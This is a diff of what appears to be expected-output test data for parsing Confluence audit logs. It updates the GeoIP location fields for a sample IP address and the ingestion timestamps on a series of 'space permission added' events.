@@ -12983,20 +12191,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -13004,7 +12206,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222630032Z", + "ingested": "2021-12-14T14:34:31.513258421Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.288Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -13078,20 +12280,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -13099,7 +12295,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222631891Z", + "ingested": "2021-12-14T14:34:31.513258818Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.287Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -13180,20 +12376,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -13201,7 +12391,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222633767Z", + "ingested": "2021-12-14T14:34:31.513259255Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.285Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -13282,20 +12472,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -13303,7 +12487,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222635655Z", + "ingested": "2021-12-14T14:34:31.513259648Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.283Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -13377,20 +12561,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -13398,7 +12576,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222637529Z", + "ingested": "2021-12-14T14:34:31.513260036Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.281Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"CREATEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -13479,20 +12657,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -13500,7 +12672,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222639402Z", + "ingested": "2021-12-14T14:34:31.513260430Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.279Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"CREATEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -13581,20 +12753,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -13602,7 +12768,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222641282Z", + "ingested": "2021-12-14T14:34:31.513260821Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.277Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"CREATEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -13676,20 +12842,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -13697,7 +12857,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222643165Z", + "ingested": "2021-12-14T14:34:31.513261213Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.275Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -13778,20 +12938,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -13799,7 +12953,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222645040Z", + "ingested": "2021-12-14T14:34:31.513261610Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.273Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -13880,20 +13034,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -13901,7 +13049,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222646900Z", + "ingested": "2021-12-14T14:34:31.513262092Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.271Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -13975,20 +13123,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -13996,7 +13138,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222648769Z", + "ingested": "2021-12-14T14:34:31.513262489Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.269Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVECOMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -14077,20 +13219,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -14098,7 +13234,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222650644Z", + "ingested": "2021-12-14T14:34:31.513262900Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.267Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVECOMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -14179,20 +13315,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -14200,7 +13330,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222652531Z", + "ingested": "2021-12-14T14:34:31.513263290Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.265Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVECOMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -14274,20 +13404,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -14295,7 +13419,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222654424Z", + "ingested": "2021-12-14T14:34:31.513263674Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.262Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -14376,20 +13500,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -14397,7 +13515,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222656297Z", + "ingested": "2021-12-14T14:34:31.513265724Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.259Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -14478,20 +13596,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -14499,7 +13611,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222658229Z", + "ingested": "2021-12-14T14:34:31.513266219Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.257Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -14580,20 +13692,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -14601,7 +13707,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222660100Z", + "ingested": "2021-12-14T14:34:31.513266643Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.255Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"SETSPACEPERMISSIONS\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 